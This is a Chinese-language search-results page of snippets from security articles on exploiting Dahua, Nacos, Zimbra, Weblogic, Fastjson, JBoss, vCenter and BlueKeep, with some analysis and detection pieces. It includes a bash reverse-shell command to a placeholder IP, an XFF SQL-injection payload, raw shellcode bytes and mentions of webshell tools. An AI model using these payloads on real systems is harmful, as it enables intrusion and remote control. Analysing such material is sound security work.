首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏网络安全攻防

    漏洞利用】最新大华综合漏洞利用工具

    项目介绍 此项目主要用于在授权情况下对大华系列产品进行漏洞检测 漏洞支持 大华综合漏洞利用工具 收录漏洞如下: 大华DSS数字监控系统attachment_clearTempFile.action注入漏洞 大华DSS数字监控系统远程命令执行漏洞 大华DSS数字监控系统itcBulletin注入漏洞 大华智慧园区综合管理平台信息泄露漏洞 大华智慧园区综合管理平台getNewStaypointDetailQuery 任意文件上传漏洞 大华智慧园区综合管理平台emap任意文件上传漏洞 大华智慧园区综合管理平台searchJson注入漏洞 大华DSS数字监控系统attachment_getAttList.action注入漏洞 大华DSS数字监控系统远程命令执行漏洞 根据程序版本优化,添加新版本的Poc webshell利用模块 大华智慧园区综合管理平台poi任意文件上传漏洞 大华智慧园区综合管理平台video任意文件上传漏洞 ,即可开始检测 cmdshell模块 选择模块进行漏洞验证,如果存在,在cmdshell输入你要执行的命令即可 webshell利用模块: 内置Godzilla Behinder jspcmdshell

    2.5K10编辑于 2024-06-21
  • 来自专栏全栈程序员必看

    XFF漏洞利用

    作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 XFF漏洞 X-Forwarded-For(XFF) 利用方式 1.绕过服务器过滤 2 X-Forwarded-For: client1, proxy1, proxy2, proxy3 //浏览器IP,第一个代理服务器,第二个三个四个等等 利用方式 1.绕过服务器过滤 XFF漏洞也称为IP 的header头部注入原理一样,服务器端会对XFF信息进行记录, 但没有进行过滤处理,就容易导致sql注入的产生 X-Forwarded-for: 127.0.0.1' and 1=1# 然后进一步利用

    3.2K10编辑于 2022-07-04
  • 来自专栏FreeBuf

    Nebula漏洞利用包CVE-2016-0189漏洞利用分析

    随后短短不到3个月时间,Neutrino EK 又转为地下,RIG EK继而成为最流行的漏洞利用工具包。今年3月初,RIG又淡出视线,而迎来了新的Nebula EK。 Nebula EK包中对CVE-2016-0189的漏洞利用,比其它漏洞利用包的漏洞利用方有了一定改进,这里进行一下深入分析。 CVE-2016-0189 漏洞利用深入分析 Nebula EK的漏洞利用在越界访问的基础上实现了: 1.泄漏VBScript对象的地址 2.读取任意地址 3.写入任意地址(受限) 这3种手段在实现原理上都是类似的 最后我们看一下,整个漏洞利用是如何工作的: 1)首先,创建一个 对象,通过上述的方法(1) 泄露该对象的地址; 2) 在该对象偏移为8的地方,利用方法(2)读取内存获取CSession对象指针; 3)然后在 利用上述方法(3)将其值修改为4,从而成功开启上帝模式。 4. 一个有趣的DLL劫持技巧 分析本来到这里可以结束了,然而我们在Nebula的漏洞利用包里发现了一个有趣的DLL劫持技巧。

    1.9K60发布于 2018-02-24
  • 来自专栏全栈工程师修炼之路

    DNS漏洞利用实践

    [TOC] 很多dns探测工具,都会首先尝试dns区域传送,然后才是暴力枚举,那么什么是DNS区域传送漏洞呢? 区域传送操作指的是一台后备服务器使用来自主服务器的数据刷新自己的zone数据库。 使用dig工具可以检测dns 区域传送漏洞,语法如下: dig axfr @域名服务器 被检测域名 示例: root@kali-xuanhun:~# dig @wormhole.movie.edu movie.edu ASPMX.L.GOOGLE.COM. zonetransfer.me. 7200 IN MX 20 ASPMX2.GOOGLEMAIL.COM. zonetransfer.me. 7200 IN MX 20 ASPMX3. robin.zonetransfer.me.zonetransfer.me. robinwood.zonetransfer.me. sip.zonetransfer.me. 3333 IN NAPTR 2 3

    1K10编辑于 2022-09-29
  • 来自专栏sktj

    python 漏洞利用脚本

    \xea\x4d\xdc\x3e\x22\x8a" "\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b" "\xbd\xca\x85\ xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a" "\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3 x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30" "\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53 " "\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85" "\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\ xe6\x7f\x2a\x86\x25" "\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10" "\xba\x1e\x53\x31")

    1.2K10发布于 2019-07-31
  • nacos RCE漏洞利用

    poc检测 FoFa: app="nacos" bp8080监听需要开启 首先我们利用压缩包中的service.py,将它上传到38.12.31.36的机器上,然后在上传到的目标文件夹输入python service.py启动服务 再利用压缩包中的nacos RCE漏洞POC.py 在压缩包目录下输入cmd然后按下回车 在cmd中输入python nacosRCE漏洞POC.py 按下回车会出现一个三角尖 ,在三角处粘贴url路径 按下回车后便会自行开启检测 此poc可以将windows和linux系统都检测到 mstsc远程桌面连接windows 当我们利用漏洞检测工具检测到windows主机时 我们便可以利用压缩包中的

    33210编辑于 2025-07-14
  • 来自专栏知道创宇

    BlueKeep 漏洞利用分析

    IcaCreateChannel开始创建大小为0x8c的信道结构体之后将会与虚拟通道id是0x1f绑定,也就是这个结构体将会被我们利用 信道的定义字段主要是名字加上配置,配置主要包括了优先级等 在server 对MCS Connect Inittial应答包,将会依次给出对应虚拟通道的id值: 在rdp内核中依次注册的值对应应该是0、1、2、3, MS_T120信道将会通过我们发送的用户虚拟id为3的值再一次绑定 发送数据主动释放其分配的结构体,其传入虚拟通道id值为3通过函数termdd! 目的是将访问从服务器重定向到客户端文件系统,其数据头部将会主要是两种标识和PacketId字段组成: 在这里我们刚好利用到了rdpde客户端name响应的数据来进行池内存的占位 在完全建立连接后,将会创建 IcaChannelInputInternal中的ExAllocatePoolWithTag分配非分页池内存,并且其长度是我们可以控制的,基本满足了UAF利用的需求: 可是在windowsxp中,直接发送

    89220发布于 2019-09-20
  • 来自专栏WhITECat安全团队

    zimbra RCE 漏洞利用

    前言 近期在测试一个目标的时候发现对方好几个zimbra的服务器,按照网上提供的利用方法测试了之后发现利用不成功!接着自己搭建了zimbra在自己进行测试之后成功利用并且拿下zimbra服务器! dpkg -i libgmp3c2_4.3.2+dfsg-2ubuntu1_amd64.deb ? 接着利用刚刚获取到的高权限的TOKEN 来进行文件上传,把webshell上传上去! 实战 zimbra RCE 复现这个漏洞主要就是遇到了这个邮箱服务器!并且存在XXE读取文件!前面的准备都是为了这一刻!!!!! 首先获取它的数据包,利用了CVE-2019-9670 XXE漏洞来读取配置文件。Zimbra配置文件位置为/conf/localconfig.xml。

    5.2K10发布于 2020-11-25
  • 来自专栏黑白天安全团队

    Weblogic漏洞利用总结

    成功反弹 CVE-2019-2618 漏洞简述 利用任意文件读取来获取weblogic的弱口令登录进入后台,然后通过上传getshell,通过构造任意文件下载漏洞环境读取到后台用户名和密码,然后登陆进后台 不过只能读取一些文件,如何更深层次利用这个漏洞呢?weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。 该漏洞有两个利用手法 利用 com.tangosol.coherence.mvel2.sh.ShellSession 执行命令 利用 com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext 利用 com.tangosol.coherence.mvel2.sh.ShellSession 执行命令 DNSLOG的使用 DNSLOG可以在某些无法直接利用漏洞获得回显的情况下, 但是目标可以发起DNS ssrf漏洞 漏洞描述 Weblogic中存在一个SSRF漏洞利用漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

    5.2K20发布于 2021-03-16
  • 来自专栏Bypass

    Fastjson 漏洞利用技巧

    每次看到json数据包,都难免会想起Fastjson以及它多个版本存在的漏洞。 如何实现自动化检测以及简化攻击步骤,从而提升漏洞发现能力,让你更有效率的Tips,在这里和大家分享下。 Github项目地址: https://github.com/pmiaowu/BurpFastJsonScan 02、简化攻击步骤 在这里我们可以使用一款JNDI服务利用工具,来简化fastjson 漏洞检测的步骤,辅助漏洞利用和渗透。 Github项目地址: https://github.com/wyzxxz/jndi_tool Fstjson漏洞利用: (1)开启RMI服务 java -cp jndi_tool.jar jndi.EvilRMIServer 1099 8888 "bash -i >&/dev/tcp/xxxx.xxx.xxx.xxx/12345 0>&1" (2)设置监听服务器 nc -lvvp 12345 (3)构造请求发送payload

    1.6K20编辑于 2022-06-24
  • 来自专栏Seebug漏洞平台

    BlueKeep 漏洞利用分析

    IcaCreateChannel开始创建大小为0x8c的信道结构体之后将会与虚拟通道id是0x1f绑定,也就是这个结构体将会被我们利用 ? 在rdp内核中依次注册的值对应应该是0、1、2、3, MS_T120信道将会通过我们发送的用户虚拟id为3的值再一次绑定,首先通过termdd! 在这里我们刚好利用到了rdpde客户端name响应的数据来进行池内存的占位 ? 在完全建立连接后,将会创建rdpdr信道的结构体 ? IcaChannelInputInternal中的ExAllocatePoolWithTag分配非分页池内存,并且其长度是我们可以控制的,基本满足了UAF利用的需求: ? 占位被free的实际数据大小为0x128,利用的中转地址是0xfffffa80ec000948 ?

    76430发布于 2019-09-20
  • 来自专栏全栈程序员必看

    ewebeditor漏洞利用总结

    4、说说漏洞基本利用步骤,还以asp为例! 登陆后台以后。选择样式管理,默认编辑器的默认样式都不可以修改的。我们可以从任意样式新建一个样式,然后在图片上传添加可上传后缀。. 先贴漏洞利用方式! ————————————————————————————————————– <H3>ewebeditor asp版 2.1.6 上传漏洞利用程序—-</H3>

    <form action 这种情况下,唯一可以利用的也就是利用遍历目录功能查看网站文件,比如数据库路径、后台地址、其他的上传地址、最直观的就是别人留下的小马等等!这些都自由发挥了!说下漏洞利用方法! 漏洞利用方式如下:在上传文件管理页面 随便选择一个上传样式!比如ewebeditor/admin_uploadfile.asp?id=14 在id后面添加&dir=../..

    1.8K20编辑于 2022-09-14
  • 来自专栏黑白天安全团队

    Jboss漏洞利用总结

    war包名字,arg1传⼊的是上传的⽂件的⽂件名,arg2传⼊的是上传⽂件的⽂件格式,arg3传⼊的是上传⽂件中的内容。 影响版本 Jboss4.x以下 漏洞利用 输⼊url http://目标IP:8080/jmx-console/HtmlAdaptor? CVE-2007-1036漏洞相同,唯一的区别是CVE-2006-5750漏洞利用methodIndex进行store()方法的调用。 若访问200,则可能存在漏洞。 ? 此处我们使用JavaDeserH2HC工具来利用漏洞,尝试直接弹回一个shell javac -cp . 漏洞利用 首先从http响应头和title中一般情况下都能看到信息来确定目标 jboss 版本是否在此漏洞版本范围 ? 现成工具 ?

    7K30发布于 2020-08-04
  • nacos RCE漏洞利用

    Nacos RCE 漏洞检测与利用教程Poc检测FoFa 搜索语法:app="nacos"准备工作:开启 BP8080 监听上传 service.py 到攻击机 (38.12.31.36)在目标目录执行 :python service.py图片漏洞检测:在压缩包目录打开 CMD图片执行检测命令:python nacosRCE漏洞POC.py图片粘贴目标 URL 路径图片自动检测结果图片该 POC 可同时检测 Windows/Linux 系统Windows 系统利用 (mstsc)检测到 Windows 主机:图片执行 EXP:运行:python exp.py图片输入目标 URL(格式:http://x.x.x.x /hello.txt http://38.12.31.36:8000/hello.txt图片验证下载成功图片图片漏洞利用工具下载 工具下载链接 内容结束

    31110编辑于 2025-07-11
  • 来自专栏tea9的博客

    利用Android Webview漏洞

    利用Android WebView漏洞 0x00 说明 测试程序来源: https://github.com/t4kemyh4nd/vulnwebview 可以直接下载app.apk进行测试 下载安装后打开长下面的样子 0x02 导出的WebView 利用导出的WebView,可以进行WebView劫持,常见的就是开放重定向漏洞利用条件webview所在的Activity需要是导出的 如何判断导出,有两种方式: 显示的声明 利用: 可以使用adb进行利用,传输参数打开恶意网页。 "token:"+Android.getUserToken()); </script> 以上脚本是从Android接口调用getUserToken方法并写入token 本地启动web服务 python3 Android WebView 漏洞

    1.7K41编辑于 2023-08-24
  • Linux内核UAF漏洞利用实战:Holstein v3挑战解析

    PAWNYABLE UAF漏洞解析(Holstein v3)引言作者分享了学习Linux内核漏洞利用的历程,重点介绍了PAWNYABLE平台提供的学习资源。 该平台包含Linux内核漏洞利用教程,涵盖调试环境搭建、CTF技巧、现代内核防护机制等内容。 技术背景漏洞类型:驱动程序中的Use-After-Free漏洞关键结构:tty_struct和msg_msg内核数据结构利用技术:KASLR绕过、堆喷(Heap Spraying)、ROP链构造漏洞分析驱动程序存在以下问题代码 ; // 计算内核基址 - 利用tty_struct的ops指针泄露内核基址控制流劫持:0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop :/dev/ptmx喷射实现堆风水多阶段UAF触发逻辑用户态-内核态切换的KPTI绕过延伸阅读推荐的内核漏洞利用资源:Grapl Security的IOUring漏洞分析Google Project Zero

    38210编辑于 2025-08-19
  • 来自专栏HACK学习

    干货 | vCenter 漏洞利用总结

    其它常见路径可以参考:vCenter2021几个漏洞及后渗透 2.4 CVE-2021-21985 2.4.1 漏洞利用 默认启用的 Virtual SAN Health Check 插件(vsan-h5 若要利用漏洞,本质上需要获取一个 XML 文件的内容,而 Java 的 URL 并不支持 data 协议,那么需要返回内容可控的 SSRF 或者文件上传漏洞。 这里利用的是返回内容可控的 SSRF 漏洞。 2.6 provider-logo SSRF 漏洞 2.6.1 漏洞利用 VMware vCenter v 7.0.x 的某些版本中存在未授权 SSRF 漏洞,可以读取本地文件造成敏感信息泄露;读取远程文件形成 3.2 CVE-2022-22948 权限配置不当 vCenter Server 包含由于文件权限不正确而导致的信息泄露漏洞,可以利用漏洞在对 vCenter Server 具有非管理员访问权限的情况下获取敏感信息

    8.4K30编辑于 2023-01-03
  • 来自专栏FreeBuf

    利用XSStrike Fuzzing XSS漏洞

    它还会扫描DOM XSS漏洞。 1、给python3安装pip,使用命令如下: sudo apt-get install python3-pip 2、下载XSStrike,命令如下: git clone https://github.com /s0md3v/XSStrike.git 3、安装依赖模块,命令如下: pip3 install -r requirements.txt 4、运行工具,命令如下: python3 xsstrike.py DOM扫描 --headers //提供HTTP标头 -d, --delay //设置延迟 实例 为了测试该工具的实用性,笔者写了一个简单的存在XSS漏洞的 我们利用工具Fuzzing出来的payload进行一下测试,测试结果如下图所示: ? *本文作者:看不尽的尘埃,转载请注明来自FreeBuf.COM

    2.5K30发布于 2018-12-28
  • 来自专栏漏洞知识库

    SSRF漏洞原理与利用

    漏洞知识库 网络安全/渗透测试/代码审计/ 关注 SSRF漏洞原理与利用 什么是SSRF? SSRF(Server-Side Request Forgery),服务器端请求伪造;利用一个可以发起网络请求的服务,可以当做跳板来攻击其他服务。 Know IT, SSRF有什么能耐? ? 内外网的端口和服务探测 主机本地敏感数据的读取 内外网主机应用程序漏洞利用 …… 等等 怎么找到SSRF漏洞? 、MSSQL、Postgres、CouchDB) Webmail收取其他邮箱邮件(POP3/IMAP/SMTP) 文件处理,编码处理,属性信息处理(ffpmg,ImageMaic,DOCX,PDF,XML > SSRF漏洞利用 访问URL: http://127.0.0.1/web/ssrf.php?url=www.baidu.com ?

    2K20发布于 2019-11-20
  • 来自专栏人人都是极客

    利用eBPF探测Rootkit漏洞

    Rootkit是一种存在于内核中复杂类型的恶意漏洞攻击,并将介绍Tracee用于检测Syscall 钩子的新特性,它实现了在内核中使用eBPF事件的独特方式。 下面,我们将看看TNT团队的例子,并查看他们是如何利用Diamorphine 这个rootkit,以及Tracee如何检测到它。 内核中的函数操作 攻击者为了自身利益最大化,会寻找内核级别的目标函数。

    1.8K10编辑于 2022-07-12
领券